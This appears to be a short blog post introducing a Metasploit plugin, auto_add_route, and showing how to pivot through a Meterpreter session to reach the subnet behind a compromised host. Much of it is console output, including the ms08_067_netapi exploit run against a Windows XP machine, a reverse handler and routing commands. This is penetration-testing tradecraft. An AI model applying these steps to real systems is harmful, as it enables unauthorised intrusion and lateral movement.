Among the coolest features in metasploit is the ability to pivot through a meterpreter session to the network on the other side.  The route command in msfconsole sets this up but requires a bit of typing to get right.

[*] Meterpreter session 1 opened (10.1.1.1:4444 -> 10.1.1.128:1238)

meterpreter > run get_local_subnets 
Local subnet: 10.1.1.0/255.255.255.0
meterpreter > background 
msf exploit(ms08_067_netapi) > route add 10.1.1.0 255.255.255.0 1
msf exploit(ms08_067_netapi) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.1.1.0           255.255.255.0      Session 1

msf exploit(ms08_067_netapi) > 

After running the above commands any traffic sent to addresses in the 10.1.1.0 network will be tunnelled through the session.  As part of my Blackhat DC presentation last week, I demo'd a plugin that automatically adds a route for any previously-unseen subnets when a new session opens up.  Here is some example usage and output:

msf exploit(ms08_067_netapi) > load auto_add_route 
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse handler on 10.1.1.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.1.1.1:4444 -> 10.1.1.128:1239)
[*] AutoAddRoute: Routing new subnet 10.1.1.0/255.255.255.0 through session 1

meterpreter > background 
msf exploit(ms08_067_netapi) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.1.1.0           255.255.255.0      Session 1

msf exploit(ms08_067_netapi) > 

The auto_add_route plugin is now available in the metasploit trunk; 'svn up' to get it.